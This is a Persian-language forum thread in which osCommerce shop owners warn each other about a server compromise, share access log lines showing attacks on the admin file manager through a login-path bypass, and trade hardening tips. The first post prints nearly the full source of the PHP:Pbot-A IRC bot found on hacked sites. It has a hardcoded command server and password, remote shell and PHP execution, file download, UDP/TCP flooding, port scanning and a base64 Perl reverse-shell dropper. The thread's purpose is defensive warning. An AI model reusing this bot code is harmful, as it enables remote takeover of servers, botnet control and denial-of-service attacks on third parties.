نظرسنجى: آیا سایت شما هم آلوده هست ؟
بله
خیر
[نمايش نتايج]
 
هشدار مهم ، خطر امنیتی !!!
نويسنده پيغام
ramindiba
Member
***


ارسالها: 234
گروهها: Registered
ورودى‌ها: ارد 1385
وضعيت: آفلاين
اعتبار: 3
پست: #1
هشدار مهم ، خطر امنیتی !!!

سلام
چند روز قبل که توی انجمن به موضوعی برخوردم راجع به وجود فایلهای f_index.php که دوستمون آقا فرهاد راجع به اون کمی اطلاعات داده بود. اما اصل موضوع چیزی خطرناکه!
که کمی تحقیق کردم و براتون مینویسم.
دوستان باید اول به ریشه سایتتون توجه کنید که آیا فایلهایی با نامهای

  1. f_index.php
  2. fly.php
  3. core


وجود داره یا نه ؟

در صورت وجود این فایلها فورا اونها رو حذف کنید. این فایلها مربوط به اسکریپتی هست که با
نام PHP:Pbot-A شناخته شده برای آنتی ویروسهاس.

البته من هر چقدر گشتم نتونستم بفهمم چطوری اینها رو تو ریشه سایت کپی کردن و با چه روشی !
اما براتون محتویات فایل اصلی رو که به نام f_index.php هست رو نشون میدم.

کد PHP:
<? 

/*
 *
 *  #crew@corp. since 2003
 *  edited by: devil__ and MEIAFASE <admin@xdevil.org> <meiafase@pucorp.org>
 *  Friend: LP <fuckerboy@sercret.gov>
 *  COMMANDS:
 *
 *  .user <password> //login to the bot
 *  .logout //logout of the bot
 *  .die //kill the bot
 *  .restart //restart the bot
 *  .mail <to> <from> <subject> <msg> //send an email
 *  .dns <IP|HOST> //dns lookup
 *  .download <URL> <filename> //download a file
 *  .exec <cmd> // uses exec() //execute a command
 *  .sexec <cmd> // uses shell_exec() //execute a command
 *  .cmd <cmd> // uses popen() //execute a command
 *  .info //get system information
 *  .php <php code> // uses eval() //execute php code
 *  .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
 *  .udpflood <target> <packets> <packetsize> <delay> //udpflood attack
 *  .raw <cmd> //raw IRC command
 *  .rndnick //change nickname
 *  .pscan <host> <port> //port scan
 *  .safe  // test safe_mode (dvl)
 *  .inbox <to> // test inbox (dvl)
 *  .conback <ip> <port> // conect back (dvl)
 *  .uname // return shell's uname using a php function (dvl)
 *
 */

set_time_limit(0); 
error_reporting(0); 
echo 
"ok!";

class 
pBot 

 var 
$config = array("server"=>"67.219.51.247",
                     
"port"=>"8080",
                     
"pass"=>"lol123",
                     
"prefix"=>"tibia",
                     
"maxrand"=>"4",
                     
"chan"=>"#tibia",
                     
"chan2"=>"#revenge",
                     
"key"=>"",
                     
"modes"=>"+p",
                     
"password"=>"lol123",
                     
"trigger"=>".",
                     
"hostauth"=>"*" // * for any hostname (remember: /setvhost pucorp.org)
                     
);
 var 
$users = array(); 
 function 
start() 
 { 
    if(!(
$this->conn fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) 
       
$this->start(); 
    
$ident $this->config['prefix'];
    
$alph range("0","9");
    for(
$i=0;$i<$this->config['maxrand'];$i++) 
       
$ident .= $alph[rand(0,9)];
    if(
strlen($this->config['pass'])>0
       
$this->send("PASS ".$this->config['pass']);
    
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
    
$this->set_nick();
    
$this->main();
 } 
 function 
main() 
 { 
    while(!
feof($this->conn)) 
    { 
       
$this->buf trim(fgets($this->conn,512)); 
       
$cmd explode(" ",$this->buf); 
       if(
substr($this->buf,0,6)=="PING :"
       { 
          
$this->send("PONG :".substr($this->buf,6)); 
       } 
       if(isset(
$cmd[1]) && $cmd[1] =="001"
       { 
          
$this->send("MODE ".$this->nick." ".$this->config['modes']); 
          
$this->join($this->config['chan'],$this->config['key']);
          if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode "on"; }
          else { 
$safemode "off"; }
          
$uname php_uname();
          
$this->privmsg($this->config['chan2'],"[\2uname!\2]: $uname (safe: $safemode)");
          
$this->privmsg($this->config['chan2'],"[\2vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
       } 
       if(isset(
$cmd[1]) && $cmd[1]=="433"
       { 
          
$this->set_nick(); 
       } 
       if(
$this->buf != $old_buf
       { 
          
$mcmd = array(); 
          
$msg substr(strstr($this->buf," :"),2); 
          
$msgcmd explode(" ",$msg); 
          
$nick explode("!",$cmd[0]); 
          
$vhost explode("@",$nick[1]); 
          
$vhost $vhost[1]; 
          
$nick substr($nick[0],1); 
          
$host $cmd[0]; 
          if(
$msgcmd[0]==$this->nick
          { 
           for(
$i=0;$i<count($msgcmd);$i++) 
              
$mcmd[$i] = $msgcmd[$i+1]; 
          } 
          else 
          { 
           for(
$i=0;$i<count($msgcmd);$i++) 
              
$mcmd[$i] = $msgcmd[$i]; 
          } 
          if(
count($cmd)>2
          { 
             switch(
$cmd[1]) 
             { 
                case 
"QUIT"
                   if(
$this->is_logged_in($host)) 
                   { 
                      
$this->log_out($host); 
                   } 
                break; 
                case 
"PART"
                   if(
$this->is_logged_in($host)) 
                   { 
                      
$this->log_out($host); 
                   } 
                break; 
                case 
"PRIVMSG"
                   if(!
$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*")) 
                   { 
                      if(
substr($mcmd[0],0,1)=="."
                      { 
                         switch(
substr($mcmd[0],1)) 
                         { 
                            case 
"user"
                              if(
$mcmd[1]==$this->config['password']) 
                              { 
                                 
$this->log_in($host);
                              } 
                              else 
                              { 
                                 
$this->notice($this->config['chan'],"[\2Auth\2]: Senha errada $nick idiota!!");
                              } 
                            break; 
                         } 
                      } 
                   } 
                   elseif(
$this->is_logged_in($host)) 
                   { 
                      if(
substr($mcmd[0],0,1)=="."
                      { 
                         switch(
substr($mcmd[0],1)) 
                         { 
                            case 
"restart"
                               
$this->send("QUIT :restart commando from $nick");
                               
fclose($this->conn); 
                               
$this->start(); 
                            break; 
                            case 
"mail"//mail to from subject message 
                               
if(count($mcmd)>4
                               { 
                                  
$header "From: <".$mcmd[2].">"
                                  if(!
mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header)) 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2mail\2]: Impossivel mandar e-mail.");
                                  } 
                                  else 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2"); 
                                  } 
                               } 
                            break;
                            case 
"safe":
                               if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
                               {
                               
$safemode "on";
                               }
                               else {
                               
$safemode "off";
                               }
                               
$this->privmsg($this->config['chan'],"[\2safe mode\2]: ".$safemode."");
                            break;
                            case 
"inboxh"//teste inbox
                               
if(isset($mcmd[1]))
                               {
                                  
$token md5(uniqid(rand(), true));
                                  
$header "From: <inbox".$token."@xdevil.org>";
                                  
$a php_uname();
                                  
$b getenv("SERVER_SOFTWARE");
                                  
$c gethostbyname($_SERVER["HTTP_HOST"]);
                                  if(!
mail($mcmd[1],"InBox Test","#crew@corp. since 2003\n\nip: $c \nsoftware: $b \nsystem: $a \nvuln: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."\n\ngreetz: wicked\nby: dvl <admin@xdevil.org>",$header))
                                  {
                                     
$this->privmsg($this->config['chan'],"[\2inbox\2]: Unable to send");
                                  }
                                  else
                                  {
                                     
$this->privmsg($this->config['chan'],"[\2inbox\2]: Message sent to \2".$mcmd[1]."\2");
                                  }
                               }
                            break;
                            case 
"conback":
                               if(
count($mcmd)>2)
                               {
                                  
$this->conback($mcmd[1],$mcmd[2]);
                               }
                            break;
                            case 
"dns"
                               if(isset(
$mcmd[1])) 
                               { 
                                  
$ip explode(".",$mcmd[1]); 
                                  if(
count($ip)==&& is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3])) 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1])); 
                                  } 
                                  else 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1])); 
                                  } 
                               } 
                            break; 
                            case 
"infoh":
                            case 
"vunl":
                               if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode "on"; }
                               else { 
$safemode "off"; }
                               
$uname php_uname();
                               
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                               
$this->privmsg($this->config['chan'],"[\2vuln\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."");
                            break;
                            case 
"bot":
                               
$this->privmsg($this->config['chan'],"[\2bot\2]: phpbot 2.0 by; #crew@corp.");
                            break;
                            case 
"uname":
                               if (@
ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode "on"; }
                               else { 
$safemode "off"; }
                               
$uname php_uname();
                               
$this->privmsg($this->config['chan'],"[\2info\2]: $uname (safe: $safemode)");
                            break;
                            case 
"rndnick"
                               
$this->set_nick(); 
                            break; 
                            case 
"raw":
                               
$this->send(strstr($msg,$mcmd[1])); 
                            break; 
                            case 
"eval":
                              
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
                            break;
                            case 
"sexec":
                               
$command substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               
$exec shell_exec($command); 
                               
$ret explode("\n",$exec); 
                               for(
$i=0;$i<count($ret);$i++) 
                                  if(
$ret[$i]!=NULL
                                     
$this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break; 

                            case 
"exec"
                               
$command substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               
$exec exec($command); 
                               
$ret explode("\n",$exec); 
                               for(
$i=0;$i<count($ret);$i++) 
                                  if(
$ret[$i]!=NULL
                                     
$this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break; 

                            case 
"passthru"
                               
$command substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               
$exec passthru($command); 
                               
$ret explode("\n",$exec); 
                               for(
$i=0;$i<count($ret);$i++) 
                                  if(
$ret[$i]!=NULL
                                     
$this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break; 

                            case 
"popen"
                               if(isset(
$mcmd[1])) 
                               { 
                                  
$command substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                                  
$this->privmsg($this->config['chan'],"[\2popen\2]: $command");
                                  
$pipe popen($command,"r"); 
                                  while(!
feof($pipe)) 
                                  { 
                                     
$pbuf trim(fgets($pipe,512)); 
                                     if(
$pbuf != NULL
                                        
$this->privmsg($this->config['chan'],"     : $pbuf"); 
                                  } 
                                  
pclose($pipe); 
                               }  
               
                            case 
"system"
                               
$command substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1); 
                               
$exec system($command); 
                               
$ret explode("\n",$exec); 
                               for(
$i=0;$i<count($ret);$i++) 
                                  if(
$ret[$i]!=NULL
                                     
$this->privmsg($this->config['chan'],"      : ".trim($ret[$i])); 
                            break; 


                            case 
"pscan"// .pscan 127.0.0.1 6667 
                               
if(count($mcmd) > 2
                               { 
                                  if(
fsockopen($mcmd[1],$mcmd[2],$e,$s,15)) 
                                     
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2"); 
                                  else 
                                     
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2"); 
                               } 
                            break; 
                            case 
"ud.server"// .ud.server <server> <port> [password] 
                               
if(count($mcmd)>2
                               { 
                                  
$this->config['server'] = $mcmd[1]; 
                                  
$this->config['port'] = $mcmd[2]; 
                                  if(isset(
$mcmcd[3])) 
                                  { 
                                   
$this->config['pass'] = $mcmd[3]; 
                                   
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]); 
                                  } 
                                  else 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]); 
                                  } 
                               } 
                            break; 
                            case 
"download"
                               if(
count($mcmd) > 2
                               { 
                                  if(!
$fp fopen($mcmd[2],"w")) 
                                  { 
                                     
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada."); 
                                  } 
                                  else 
                                  { 
                                     if(!
$get file($mcmd[1])) 
                                     { 
                                        
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2"); 
                                     } 
                                     else 
                                     { 
                                        for(
$i=0;$i<=count($get);$i++) 
                                        { 
                                           
fwrite($fp,$get[$i]); 
                                        } 
                                        
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2"); 
                                     } 
                                     
fclose($fp); 
                                  } 
                               }
                               else { 
$this->privmsg($this->config['chan'],"[\2download\2]: use .download http://your.host/file /tmp/file"); }
                            break; 
                            case 
"die"
                               
$this->send("QUIT :die command from $nick");
                               
fclose($this->conn); 
                               exit; 
                            case 
"logout"
                               
$this->log_out($host); 
                               
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!"); 
                            break; 
                            case 
"udpflood"
                               if(
count($mcmd)>3
                               { 
                                  
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]); 
                               } 
                            break; 
                            case 
"tcpflood"
                               if(
count($mcmd)>5
                               { 
                                  
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]); 
                               } 
                            break; 
                         } 
                      } 
                   } 
                break; 
             } 
          } 
       } 
       
$old_buf $this->buf
    } 
    
$this->start(); 
 } 
 function 
send($msg
 { 
    
fwrite($this->conn,"$msg\r\n"); 

 } 
 function 
join($chan,$key=NULL
 { 
    
$this->send("JOIN $chan $key"); 
 } 
 function 
privmsg($to,$msg)
 {
    
$this->send("PRIVMSG $to :$msg");
 }
 function 
notice($to,$msg)
 {
    
$this->send("NOTICE $to :$msg");
 }
 function 
is_logged_in($host
 { 
    if(isset(
$this->users[$host])) 
       return 
1
    else 
       return 
0
 } 
 function 
log_in($host
 { 
    
$this->users[$host] = true
 } 
 function 
log_out($host
 { 
    unset(
$this->users[$host]); 
 } 
 function 
set_nick() 
 { 
    if(isset(
$_SERVER['SERVER_SOFTWARE'])) 
    { 
       if(
strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache")) 
          
$this->nick "[A]"
       elseif(
strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis")) 
          
$this->nick "[I]"
       elseif(
strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami")) 
          
$this->nick "[X]"
       else 
          
$this->nick "[U]"
    } 
    else 
    { 
       
$this->nick "[C]"
    } 
    
$this->nick .= $this->config['prefix']; 
    for(
$i=0;$i<$this->config['maxrand'];$i++) 
       
$this->nick .= mt_rand(0,9); 
    
$this->send("NICK ".$this->nick);
 } 
  function 
udpflood($host,$packetsize,$time) {
    
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]"); 
    
$packet "";
    for(
$i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
    
$timei time();
    
$i 0;
    while(
time()-$timei $time) {
        
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
          
fwrite($fp,$packet);
           
fclose($fp);
        
$i++;
    }
    
$env $i $packetsize;
    
$env $env 1048576;
    
$vel $env $time;
    
$vel round($vel);
    
$env round($env);
    
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
 function 
tcpflood($host,$packets,$packetsize,$port,$delay
 { 
    
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]"); 
    
$packet ""
    for(
$i=0;$i<$packetsize;$i++) 
       
$packet .= chr(mt_rand(1,256)); 
    for(
$i=0;$i<$packets;$i++) 
    { 
       if(!
$fp=fsockopen("tcp://".$host,$port,$e,$s,5)) 
       { 
          
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>"); 
          return 
0
       } 
       else 
       { 
          
fwrite($fp,$packet); 
          
fclose($fp); 
       } 
       
sleep($delay); 
    } 
    
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port."); 
 }
 function 
conback($ip,$port)
 {
    
$this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
    
$dc_source "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx+JlNFUlZFUiIpOw0 KICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsNCiAgb3BlbihTVERFUlIsIj4mU0VSVkVSIik7DQogIGV 4ZWMgeycvYmluL3NoJ30gJy1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxw0KICBleGl0KDApOw0KfQ0KcHJp bnQgIlsqXSBEYXRhY2hlZFxuXG4iOw==";
    if (
is_writable("/tmp"))
    {
      if (
file_exists("/tmp/dc.pl")) { unlink("/tmp/dc.pl"); }
      
$fp=fopen("/tmp/dc.pl","w");
      
fwrite($fp,base64_decode($dc_source));
      
passthru("perl /tmp/dc.pl $ip $port &");
      
unlink("/tmp/dc.pl");
    }
    else
    {
    if (
is_writable("/var/tmp"))
    {
      if (
file_exists("/var/tmp/dc.pl")) { unlink("/var/tmp/dc.pl"); }
      
$fp=fopen("/var/tmp/dc.pl","w");
      
fwrite($fp,base64_decode($dc_source));
      
passthru("perl /var/tmp/dc.pl $ip $port &");
      
unlink("/var/tmp/dc.pl");
    }
    if (
is_writable("."))
    {
      if (
file_exists("dc.pl")) { unlink("dc.pl"); }
      
$fp=fopen("dc.pl","w");
      
fwrite($fp,base64_decode($dc_source));
      
passthru("perl dc.pl $ip $port &");
      
unlink("dc.pl");
    }
    }
  }


$bot = new pBot
$bot->start(); 

?>


این اسکریپت روباتی را طراحی میکنه و به روبات اجازه می دهد تا دستوراتی را برای درگاههای TCP و UDP ارسال کنه.

البته تمامی دستورات رو میتونید ببنید. احتمالا ارسال کننده این فایل برای انجام عملیات خاصی این دستورات رو اماده کرده تا در صورت لزوم به وقتش اجرا کنه . من اولش فکر کردم شاید میخواسته از سایت فروشگاهی ما کپی بگیره اما معلوم شده احتمالا کار بزرگتری داشته و احتمالا از سرور مون میخواد استفاده کنه !!!

فایل core هم همون فایلی هست که حجمش زیادتره و به نظر مییاد که محتویاتش هم مربوط به عملیاتی هست که انجام داده.


اگر دوستان بتونن این فایل f_index.php رو تو محیط ادیتوری سایتشون ببیننن ، کنترل کنن که آیا ای پی و رمز مشابه اونکی ما نشون دیدیم هست یا چیز دیگه ای هست.
اگه یکی باشه یعنی کسی در حال نفوذ به فروشگاههای ماست و این فرد میتونه وارد ریشه سایتهامون بشه ! من این فایلها رو روی چند تا از سایتهای فروشگاهی مون پیدا کردم.

اگه کنترل پانل سایتتون آنتی ویروس ClamAV Scanner رو داره با اون محتویات سایتتون رو بررسی کنید.

اگه تونستید بفهمید چطوری به سایتهامون دسترسی پیدا کردن بهمون اطلاع بدید.

ممنون و موفق باشید.




توانمندی این پورتال را در فروشگاههای ما ببینید :
نسخه جدید :

فروشگاه تخصصی نرم افزار کیش و مات

کلوب اینترنت

نسخه قدیمی :

فروشگاه تخصصی تجهیزات بارکدی دیبا

فروشگاه تی تی مارکت

اين ارسال آخرين بار در تاريخ: 01-05-1389 07:16 قبل‌ازظهر ويرايش شده است. شخص ويرايشگر: ramindiba.

12-29-1388 02:31 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
ramindiba
Member
***


ارسالها: 234
گروهها: Registered
ورودى‌ها: ارد 1385
وضعيت: آفلاين
اعتبار: 3
پست: #2
RE: هشدار برای کبرا 11 !!! خطر امنیتی !!!

برای رفع موقتی این مسئله فایلی با نام f_index.php
و با محتویات

کد PHP:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<
html xmlns="http://www.w3.org/1999/xhtml" dir="rtl">

<
head>
<
meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<
META http-equiv="refresh" content="1;URL=http://www.barcodeshop.com/index.php"/>

</
head>

<
body>

</
body>

</
html

بسازید و به جای آدرس پیش فرض آدرس سایتتون رو بنویسید و به ریشه فروشگاه انتقال بدید.
و سطح دسترسی به آن را 444 قرار دهید.




توانمندی این پورتال را در فروشگاههای ما ببینید :
نسخه جدید :

فروشگاه تخصصی نرم افزار کیش و مات

کلوب اینترنت

نسخه قدیمی :

فروشگاه تخصصی تجهیزات بارکدی دیبا

فروشگاه تی تی مارکت

12-29-1388 03:06 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
ramindiba
Member
***


ارسالها: 234
گروهها: Registered
ورودى‌ها: ارد 1385
وضعيت: آفلاين
اعتبار: 3
پست: #3
هشدار برای کبرا 11 !!! خطر امنیتی !!!

دوستان عزیز حتما این مطلب رو بخونید و انجام دهید. از دوستمون آقافرهاد هم میخوام به تمامی دوستان انجمن ایمیل بزنن و اطلاع بدن تا قبل از هر اقدام خرابکاری اقدامات اصلاحی رو انجام بدهند.

در بررسی های اخیرم روش انتقال فایلهای آلوده رو فهمیدم و اون چیزی نیس مگر اشکالی در قسمت مدیریت و فایل file_manager.php. اولین کار شما این خواهد بود که این فایل رو پاک کنید یا تغییر نام بدهید.
البته روش این انتقال رو هم پیدا کردم که بسیار ساده هست و احتمالا کسانی از داخل کشورمون
به تازگی این روش رو یاد گرفتن و سعی میکنن که برای انجام کارشون در زمان معینی اقدام کنن !!!

کار دوم شما هم تغییر کلیه رمزهای قسمت مدیریت و دیتابیس سایتتون خواهد بود. تا احیانا اگه تاکنون
هکی انجام نشده اقدام پیش گیرانه انجام بشه !!!

آگه میخواهید بدونید کسی سعی در نفوذ به سایتتون داشته به فایل Log سایتتون برید و کنترل کنید همچنین کدهای رو دارید یا نه ؟!!!

کد PHP:
94.142.129.147 - - [04/Sep/2009:22:36:03 -0500"POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 200 46617
174.129.177.51 
- - [23/Oct/2009:17:33:22 -0500"GET /admin/orders.php/login.php HTTP/1.1" 200 37728
64.186.244.174 
- - [09/Nov/2009:07:46:22 -0600"GET /admin/file_manager.php/login.php HTTP/1.1" 200 44327
74.220.219.147 
- - [10/Nov/2009:10:33:14 -0600"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
64.186.244.174 - - [14/Nov/2009:01:46:44 -0600"GET /admin/file_manager.php/login.php HTTP/1.1" 200 44327
64.186.244.174 
- - [14/Nov/2009:01:46:44 -0600"GET /admin/file_manager.php/login.php?goto=/www/htdocs//images/ HTTP/1.1" 302 -
64.186.244.174 - - [14/Nov/2009:01:46:44 -0600"POST /admin/file_manager.php/login.php?action=insert HTTP/1.1" 200 78491
64.186.244.174 
- - [14/Nov/2009:01:46:45 -0600"GET /admin/file_manager.php/login.php?goto=/www/htdocs//images/yahoo HTTP/1.1" 302 -
64.186.244.174 - - [14/Nov/2009:01:46:45 -0600"POST /admin/file_manager.php/login.php?action=processuploads HTTP/1.1" 302 -
85.17.201.131 - - [23/Nov/2009:09:17:54 -0600"POST /admin/file_manager.php/login.php?action=save HTTP/1.1" 200 44327
66.96.128.60 
- - [09/Dec/2009:23:08:56 -0600"POST /admin/file_manager.php/login.php?a=1&action=save HTTP/1.1" 200 16552
207.115.80.2 
- - [19/Dec/2009:16:53:41 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
173.9.234.93 - - [19/Dec/2009:17:36:00 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
173.9.234.93 - - [22/Dec/2009:17:23:14 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
173.9.234.93 - - [23/Dec/2009:10:36:09 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
173.9.234.93 - - [23/Dec/2009:21:05:38 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 -
173.9.234.93 - - [24/Dec/2009:08:10:22 +0100"POST /admin/mail.php/login.php?action=send_email_to_user HTTP/1.1" 302 


طی این چند روز پچ های امنیتی این مشکل رو براتون میزارم تا هر چه سریعتر اقدام کنید.
موفق باشید.




توانمندی این پورتال را در فروشگاههای ما ببینید :
نسخه جدید :

فروشگاه تخصصی نرم افزار کیش و مات

کلوب اینترنت

نسخه قدیمی :

فروشگاه تخصصی تجهیزات بارکدی دیبا

فروشگاه تی تی مارکت

01-01-1389 08:17 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
Gorgeaseman
یک فیلم ، یک تجربه
***
tester

ارسالها: 366
گروهها: tester
ورودى‌ها: تیر 1388
وضعيت: آفلاين
اعتبار: 2
پست: #4
RE: هشدار مهم ، خطر امنیتی !!!

البته بهتره پوشهء admin و تمام زیر شاخه هاش رو از طریق قسمت Password Protect Directories در سی پنل، با رمز محافظت کنید که رمزتون دوقبضه بشه! Big Grin در ضمن میتونید نام پوشهء admin رو هم عوض کنید و یه نام دیگه هم براش بذارید! مثل modir1389 (مثلا) البته تغییرات رو در فایل پیکربندی ادمین هم باید اعمال کنید! Wink

نمونه: http://shop.gorgeaseman.net/shop/admin




 
فرمان دادم تا بدنم را بدون این که مومیایی کنند و یا در تابوت بگذارند در گور قرار دهند تا ذرات تنم خاک ایران شود.

>> کورش کبیر <<

 

اين ارسال آخرين بار در تاريخ: 01-17-1389 10:48 بعدازظهر ويرايش شده است. شخص ويرايشگر: Gorgeaseman.

01-16-1389 06:48 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
farman
Member
***


ارسالها: 97
گروهها: Registered
ورودى‌ها: اسف 1388
وضعيت: آفلاين
اعتبار: 0
پست: #5
RE: هشدار مهم ، خطر امنیتی !!!

حدود 2 ماه پیش من هم همچنین مشکلی داشتم!
ولی گمان میکردم فقط برای من به تنهایی اتفاق افتاده و اگه جایی بگم کسی نتونه کمک کنه یا جدی بگیره.
شاید هم گمان میکردم بخاطر تنظیمات امنیتی host خودم بوده و ایراد از من بوده تا اینکه اینجا این تاپیک رو دیدم.
البته حدود 1 ماه پیش هم توی یک فروم یا جایی شاید همینجا یا جای دیگه که یادم نیست بصورت خلاصه نوشتم.

کار فایل f_index.php این هست که بدون نیاز به هیچ رمزی هر فایل دلخواهی رو در هاست کپی میکنه.
و من هم اون رو بصورت اتفاقی دیدم و حذف کردم.

یادمه که بصورت تست خود oscommerce 2.2 اصلی که از سایت اصلی اون دانلود کرده بودم رو نصب کرده بودم و حتی 4 زبانه بود و هنوز هیچ ماژولی روی اون نصب نکرده بودم که این اتفاق افتاد.

جهت امنیت اومدم و کلاً ftp رو از روی هاست غیر فعال کردم و هر وقت نیازه اون رو فعال میکنم و پس از استفاده دوباره اون رو غیر فعال میکنم.به دوستان هم پیشنهاد می کنم همین کار رو انجام بدن.چون همونطور که میدونید موقع استفاده از ftp پسورد بصورت over net هست و خیلی از مرورگرها موقع استفاده هشدار میدهند.



01-18-1389 01:34 قبل‌ازظهر
پیدا کردن تمامی ارسالهای کاربر
ramindiba
Member
***


ارسالها: 234
گروهها: Registered
ورودى‌ها: ارد 1385
وضعيت: آفلاين
اعتبار: 3
پست: #6
RE: هشدار مهم ، خطر امنیتی !!!

البته دوستای عزیز فایلی رو همه تون بهش اشاره میکنید نسخه خیلی ساده اونی هست که من در اول تاپیک نشون دادم. این نسخه که من اعلام کردم میتونه اقادامت زیادی انجام بده.
من فایل اصلی رو اینجا ناقص کردم تا روی سیستمون ویروسی نشه چون کافیه فایل بالا رو تو سیستمون ذخیره کنید تا آنتی ویروستون سر و صدا کنه.




توانمندی این پورتال را در فروشگاههای ما ببینید :
نسخه جدید :

فروشگاه تخصصی نرم افزار کیش و مات

کلوب اینترنت

نسخه قدیمی :

فروشگاه تخصصی تجهیزات بارکدی دیبا

فروشگاه تی تی مارکت

01-18-1389 06:17 قبل‌ازظهر
مشاهده وب سایت کاربر پیدا کردن تمامی ارسالهای کاربر
sinakhan
Junior Member
**


ارسالها: 38
گروهها: Registered
ورودى‌ها: آبا 1386
وضعيت: آفلاين
اعتبار: 0
پست: #7
RE: هشدار مهم ، خطر امنیتی !!!

http://forum.e-virtu.com/showthread.php?tid=2910


چگونه امنیت فارسی ایکامرس را بالا ببریم ؟

=================

How to secure your site. All the stuff you should to prevent posting 'My Sites Been Hacked



06-16-1389 05:52 بعدازظهر
پیدا کردن تمامی ارسالهای کاربر

نمايش نسخه قابل چاپ
فرستادن اين مبحث به يك دوست
مشترك شده در اين مبحث | افزودن اين مبحث به موارد موردعلاقه

پرش در انجمن: